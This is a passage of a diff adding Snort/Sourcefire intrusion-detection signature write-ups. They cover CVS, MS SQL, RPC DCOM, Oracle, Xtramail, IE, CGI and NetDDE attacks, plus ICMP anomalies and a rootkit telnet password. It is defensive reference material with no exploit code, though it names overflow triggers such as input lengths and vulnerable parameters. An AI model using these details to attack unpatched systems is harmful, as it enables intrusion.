+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 datagrams with undefined ICMP Codes are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2317.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2317
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Concurrent Versions System (CVS).
+
+--
+Impact:
+Serious. Manipulation of the host file system is possible.
+
+--
+Detailed Information:
+Concurrent Versions System (CVS) is used to track the history of source
+code files when developing software.
+
+Some versions of CVS contain a vulnerability that may allow an attacker
+to create directories or files in the host filesystem external to the
+cvsroot. This is achieved via a malformed module request.
+
+--
+Affected Systems:
+	CVS versions prior to 1.11.10
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted request to a cvs server and
+create files and directories of their choosing in the hosts root
+filesystem. The attacker may then access these files at will to further
+compromise the system.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If compression is being used in data communications between the CVS
+server and clients, this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
+
+--
--- /dev/null
+++ b/doc/signatures/1759.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid: 
+1759
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3434.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3434
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2637.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2637
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
--- /dev/null
+++ b/doc/signatures/2690.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2690
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure enable_propagation_to_dblink
+. This procedure is included in
+sys.dbms_defer_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3124.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3124
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1636.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+
+1636
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer in Xtramail.
+
+--
+Impact:
+An attacker can execute an arbitrary command with the privilege of the user running Xtramail, typically root.
+
+--
+Detailed Information:
+Xtramail is a Mail Transfer Agent ,normally listening on port 110 and 25. Older versions have a buffer overflow in the remote service when it is issued the large input strings in the Username field.
+
+There are several unchecked buffers in XtraMail 1.11, which when overflowed will crash the server and cause a denial of service.
+
+--
+Affected Systems:
+
+	Artisoft XtraMail v1.11
+
+--
+Attack Scenarios:
+The POP3 server buffer can be overflowed by sending more than 1500 characters to the PASS argument.
+
+The SMTP server buffer can be overflowed by sending more than 10,000 charcters in the HELO argument.
+
+The username buffer for remote administration can be overflowed by sending more than 10,000 characters.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Certain types of binary file attachments could generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate patches
+
+Upgrade to the latest non-affected version of the software. 
+
+Block incoming attachments with .bat, .exe, .pif, and .scr extensions 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+http://www.securityfocus.com/bid/791
+
+--
--- /dev/null
+++ b/doc/signatures/3448.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3448
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2553.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2553
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3461.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3461
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer
+using the Content-Type parameter.
+
+--
+Impact:
+Serious. Code execution is possible.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle Content-Type or
+Content-Encoding headers returned from a server. It is possible to
+overflow a static buffer in urlmon.dll by supplying more than 300 bytes
+of data in the parameter for those headers.
+
+Specifically the error occurs when an image tag <img> is used to pass
+the excess data to both those header fields in a server response. Since
+some email clients use Internet Explorer to process HTML email messages,
+it is also possible to cause this overflow to occur via email.
+
+--
+Affected Systems:
+	Microsoft Windows systems
+
+--
+Attack Scenarios:
+An attacker can supply a malicious HTML file to a mail client containing
+excess data in the Content-Type and Content-Encoding headers that will
+overflow the buffer presenting them with the opportunity to write to
+various parts of memory and possibly execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/901.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+901
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1483.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1483
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2866.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2866
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_site_priority_site
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1195.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1195
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1069.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1069
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000827.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000827
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "email" parameter in the "address.view.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/393.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+393
+
+--
+
+Summary:
+This event is generated when an ICMP Datagram Conversion Error message is detected on the network with an invalid ICMP code.  ICMP Datagram Conversion Error messages were developed with the introduction of IPv6 to give information about invalid datagram conversions between IPv4 and IPv6.
+
+--
+
+Impact:
+No known attack vectors are known that use ICMP type 31 datagrams.  This is purely an informational message that detects errors on the network.  Only ICMP Codes 0 through 11 have been defined by IANA, ICMP Type 31 datagrams with ICMP Codes other than these values are invalid.
+
+--
+
+Detailed Information:
+ICMP Type 31 was developed to return information about datagram conversion errors between IPv4 and IPv6 as data is converted between them.  
+
+--
+
+Attack Scenarios:
+None known
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Datagram Conversion Error messages.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 31 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2964.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2964
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1622.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1622
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3285.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3285
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/216.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+216
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "satori". This is a known password for 
+the Satori Linux rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats
+http://www.whitehats.com/info/IDS516
+
+--
--- /dev/null
+++ b/doc/signatures/1669.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1669
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
